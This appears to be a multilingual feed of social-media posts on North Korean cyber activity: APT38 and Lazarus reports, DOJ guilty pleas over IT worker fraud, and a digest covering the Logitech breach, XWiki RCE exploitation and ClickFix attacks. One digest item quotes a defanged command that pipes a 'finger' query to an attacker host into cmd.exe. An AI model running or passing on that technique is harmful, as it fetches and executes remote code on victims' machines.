5 plead guilty to laptop farm and ID theft scheme to land North Koreans US IT jobs https://arstechni.ca/DtFP #NorthKorea #Security #Biz&IT #itjobs #apt38 #fraud

DOJ announces new actions targeting illicit DPRK-linked schemes, including identity fraud enabling remote IT work at 136+ U.S. companies and APT38 crypto heists exceeding $15M.

Key elements:
• Multiple guilty pleas (U.S. & international)
• Unauthorized remote access + identity misuse
• Cryptocurrency laundering + ongoing seizure efforts
• DOJ, FBI & NSD coordination under DPRK RevGen initiative
Thoughts on improving remote-work identity vetting?
👍 Follow for more verified, unbiased cyber reporting.

#infosec #APT38 #Cybercrime #ThreatIntel #DOJ #NorthKorea #SecurityOps #CyberPolicy #DigitalForensics

USA zerschlagen nordkoreanisches IT-Betrugsnetzwerk – landesweite Maßnahmen gegen Regime-Finanzierung

Laut Gerichtsunterlagen unterstützten US- und ukrainische Mittelsmänner nordkoreanische IT-Fachkräfte dabei, sich mithilfe gestohlener oder gefälschter Identitäten bei US-Unternehmen als Remote-Worker auszugeben.

https://www.all-about-security.de/usa-zerschlagen-nordkoreanisches-it-betrugsnetzwerk-landesweite-massnahmen-gegen-regime-finanzierung/

#USJustizministerium #Nordkorea #RemoteITFraud #apt38 #remotearbeit

Morning, cyber pros! It's been a bit light on news over the last 24 hours, but we've still got some critical updates to chew on. We're looking at a major data breach, an actively exploited RCE vulnerability, an old protocol making a malicious comeback, and a significant legal crackdown on North Korean illicit activities. Let's dive in:

Logitech Hit by Clop Extortion ⚠️
- Hardware giant Logitech has confirmed a data breach following an extortion claim by the Clop gang, who leaked 1.8 TB of data.
- The breach stemmed from a third-party zero-day vulnerability, likely CVE-2025-61882 in Oracle E-Business Suite, which Clop actively exploited in July 2025.
- While Logitech states no sensitive national ID or credit card data was compromised, the incident highlights Clop's consistent use of zero-days in mass data theft campaigns, previously seen with Accellion, GoAnywhere, and MOVEit.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/logitech-confirms-data-breach-after-clop-extortion-attack/

RondoDox Botnet Exploiting XWiki RCE 🛡️
- The RondoDox botnet is actively exploiting CVE-2025-24893, a critical eval injection vulnerability (CVSS 9.8) in unpatched XWiki instances, to achieve arbitrary code execution.
- This flaw allows any guest user to execute remote code via a request to the "/bin/get/Main/SolrSearch" endpoint, and has been in the wild since at least March 2025.
- CISA added this to its KEV catalog, urging federal agencies to patch by November 20th. Exploitation attempts have surged, with RondoDox adding these devices to its botnet for DDoS attacks, alongside other actors deploying crypto miners and reverse shells.

📰 The Hacker News | https://thehackernews.com/2025/11/rondodox-exploits-unpatched-xwiki.html

'Finger' Protocol Abused for Malware Delivery 🕵️
- Threat actors are leveraging the decades-old 'finger' protocol (TCP port 79) to retrieve and execute remote commands on Windows devices in recent ClickFix malware attacks.
- The technique involves piping the output of a 'finger' command (e.g., `finger vke@finger.cloudmega[.]org`) directly into `cmd.exe`, causing the retrieved commands to run locally.
- Observed campaigns deliver Python-based infostealers or NetSupport Manager RAT, with some variants including anti-analysis checks for tools like Wireshark and Process Hacker. Defenders should block outgoing traffic to TCP port 79.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/

US Cracks Down on North Korean IT Worker Fraud ⚖️
- Five U.S. citizens have pleaded guilty to assisting North Korea's illicit revenue generation by enabling IT worker fraud, impacting over 136 U.S. companies and generating $2.2 million for the DPRK regime.
- The schemes involved using stolen U.S. identities, hosting company laptops in "laptop farms," and facilitating remote access to make it appear workers were in the U.S.
- This legal action, alongside the forfeiture of over $15 million in cryptocurrency stolen by APT38 (BlueNoroff), underscores ongoing efforts to disrupt North Korea's funding for its weapons programmes.

📰 The Hacker News | https://thehackernews.com/2025/11/five-us-citizens-plead-guilty-to.html

#CyberSecurity #ThreatIntelligence #DataBreach #Clop #Ransomware #ZeroDay #Vulnerability #RCE #XWiki #Botnet #DDoS #Malware #FingerProtocol #ClickFix #NorthKorea #DPRK #APT38 #BlueNoroff #Cybercrime #InfoSec #IncidentResponse #PatchManagement

DOJ: 5 guilty pleas tied to North Korea’s IT worker scheme. 136 U.S. companies hit, $2.2M earned, and $15M in stolen crypto seized from APT38/Lazarus operations.

#CyberSecurity #NorthKorea #APT38 #DOJ #ThreatIntel #CryptoCrime

📢 Lazarus (APT38) : profil actualisé, TTPs et exploitation de zero-days
📝 Selon Picus Security, ce billet d’analyse présente un panorama actualisé du groupe Lazarus (APT38/Hidden Cobra), ses cibles, ses opérations...
📖 cyberveille : https://cyberveille.ch/posts/2025-10-19-lazarus-apt38-profil-actualise-ttps-et-exploitation-de-zero-days/
🌐 source : https://www.picussecurity.com/resource/blog/lazarus-group-apt38-explained-timeline-ttps-and-major-attacks
#APT38 #IOC #Cyberveille

"Lazarus Phishing Campaign Detected (APT38)" published by BretWitt. #APT38, #Youtube, #DPRK, #CTI https://www.youtube.com/watch?v=py4KMWYCgPk

Uncovered: Lazarus Group's #APT38 uses Cosmic Rust malware to target macOS devices, linking back to known C&C servers. This highlights ongoing threats from North Korean hackers involved in global financial attacks. 💻💥 #LazarusGroup #Korea https://www.hendryadrian.com/apt38-infrastructure-hunt-uncovers-macos-malware/

"Unpacking APT38: Static and Dynamic Analysis of Lazarus Group Malware" published by DionAlexander. #APT38, #DPRK, #CTI https://medium.com/@InfoSecDion/unpacking-apt38-static-and-dynamic-analysis-of-lazarus-group-malware-d2828e0fd6f0

#FBI has confirmed that #NorthKorean hackers stole $1.5 billion from cryptocurrency exchange #Bybit on Friday in the largest crypto heist recorded until now.
#LazarusGroup #APT38 #CyberCrime https://www.bleepingcomputer.com/news/security/fbi-confirms-lazarus-hackers-were-behind-15b-bybit-crypto-heist/

#OpenAI says it blocked several North Korean hacking groups from using its #ChatGPT platform to research future targets and find ways to hack into their networks.
#APT38 #CyberAttacks #CyberAlert #Hacking https://www.bleepingcomputer.com/news/security/openai-bans-chatgpt-accounts-used-by-north-korean-hackers/

"Cybercrime: A Multifaceted National Security Threat" published by Google. #APT38, #APT43, #APT45, #ITWorker, #Trend, #UNC1069, #UNC3782, #UNC4899, #DPRK, #CTI https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat

"APT38 Attacks A CEO by MacOS Malware" published by Mamun. #APT38, #macOS, #DPRK, #CTI https://medium.com/@alfalahum/apt38-attacks-a-ceo-by-macos-malware-0c089cd2a935

"USA v. APPROXIMATELY 2210.8222 OF SOL CRYPTOCURRENCY" published by USCOURTS. #APT38, #Cryptocurrency, #Rain, #TraderTraitor, #DPRK, #CTI https://storage.courtlistener.com/recap/gov.uscourts.dcd.275374/gov.uscourts.dcd.275374.1.0.pdf

"USA v. BITCOIN AND BTC.B SEIZED FROM EIGHT TRANSACTION HASHES AT CRYPTOCURRENCY BRIDGE-1" published by USJustice. #Cryptocurrency, #Stake, #APT38, #Lazarus, #DPRK, #CTI https://regmedia.co.uk/2024/10/07/stake_lazarus_group_lawsuit.pdf

"USA v. APPROXIMATELY 1,694,395.463328 OF TETHER CRYPTOCURRENCY" published by USJustice. #Cryptocurrency, #Deribit, #APT38, #Lazarus, #DPRK, #CTI https://regmedia.co.uk/2024/10/07/deribit_hack_court_documents.pdf

Verfassungsschutz und Südkorea warnen: Nordkorea attackiert Rüstungsunternehmen | Security https://www.heise.de/news/Verfassungsschutz-und-Suedkorea-warnen-Nordkorea-attackiert-Ruestungsunternehmen-9632155.html #Lazarus #APT38 #Ransomware #Malware

BitCoins To Bombs: North Korea Funds Military With Billions In Stolen Cryptocurrency - A report from the firm Recorded Future finds that billions in gains from cryptocurrency h... https://feeds.feedblitz.com/~/843107900/0/thesecurityledger~BitCoins-To-Bombs-North-Korea-Funds-Military-With-Billions-In-Stolen-Cryptocurrency/ #publishedresearch #cryptocurrency #recordedfuture #spear-phishing #lazarusgroup #technologies #northkorea #topstories #government #companies #spotlight #reports #apt38

"Assessed Cyber Structure and Alignments of North Korea in 2023" published by Mandiant. #Trend, #APT38, #UNC1720, #APT43, #APT37, #UNC4899, #UNC614, #UNC1069, #TEMP.Hermit, #CTI, #OSINT, #LAZARUS https://www.mandiant.com/resources/blog/north-korea-cyber-structure-alignment-2023

"Anticipating File-Borne Threats: How Deep File Inspection Technology Will Shape the Future of Cyber Defense" published by Inquest. #Trend, #APT37, #Kimsuky, #APT38, #CTI, #OSINT, #LAZARUS https://inquest.net/blog/anticipating-file-borne-threats-how-deep-file-inspection-technology-will-shape-the-future-of-cyber-defense/